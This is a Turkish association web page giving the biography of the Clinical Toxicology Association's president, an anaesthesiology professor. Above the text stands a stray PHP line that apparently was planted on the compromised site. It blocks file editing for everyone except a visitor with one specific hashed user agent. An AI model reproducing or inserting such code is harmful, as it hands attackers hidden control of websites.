if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } DERNEK BAŞKANI - Klinik Toksikoloji Derneği
Klinik Toksikoloji Derneği
 

Prof. Dr. Leyla İYİLİKÇİ KARAOĞLAN

 
1988 yılında Dokuz Eylül Üniversitesi Tıp Fakültesinden mezun oldu.1988-1990 yılları arasında Kütahya Domaniç.-Kütahya Sağlık Ocağı, Kütahya – Merkez Sağlık Ocağı, Kuşadası Devlet Hastanesi’nde görev yaptı. 1991 yılında  DEÜTF  Anesteziyoloji ve Reanimasyon Anabilim Dalı’nda asistan olarak göreve başladı,1994-1995 tarihleri arasında  karaciğer transplantasyonunda Anestezi, Yoğun bakım tedavileri konusunda  CIES, Fransa Dişişleri Bakanlığı bursu ile, bir yıl süreyle Faculte de Medecine, Sud Universite,Paul Brausse Hospital,Paris, FRANSA da eğitim aldı. Burada uzmanlık tezini ORTHOTOPİK KARACİĞER TRANSPLANTASYONUNDA TOTAL PORTA KAVAL KLEMPAJ VE LATERAL KLEMPAJ TEKNİKLERİNİN PEROPERATUVAR DÖNEMDE HEMODİNAMİK ETKİLERİNİN KARŞILAŞTIRILMALI OLARAK ARAŞTIRILMASI konusunda yaptı.1996 yılında uzman olarak, mezun oldu. Aynı klinikte öğretim görevlisi olarak göreve başladı, 2006 yılında DEÜTF Anesteziyoloji ve Reanimasyon AD’de doçent, 2011 yılında aynı fakülte de profesör olarak atandı.

Halen DEÜTF Tıp Fakültesi Anesteziyoloji ve Reanimasyon Anabilim Dalında, Ameliyathane Dışı Anestezi ve Karaciğer Transplantasyonu konularında çalışmaktadır DEÜTF .Palyatif Bakım Merkezi’nde yönetim kurulundadır. Birçok idari görevde ve derneklerin yönetim kurulun da görev yapmıştır.

Üye olduğu dernekler, European Society of Anesthesiology, Türk Anesteziyoloji ve Reanimasyon Derneği, Klinik Toksikoloji Derneği, İzmir Tabip Odası dır.

1997 yılından itibaren Klinik Toksikoloji Derneğin de faal olarak gerek katılımcı, gerekse yönetim de aktif olarak çalışmaktadır.

 
Social media & sharing icons powered by UltimatelySocial
YouTube
WhatsApp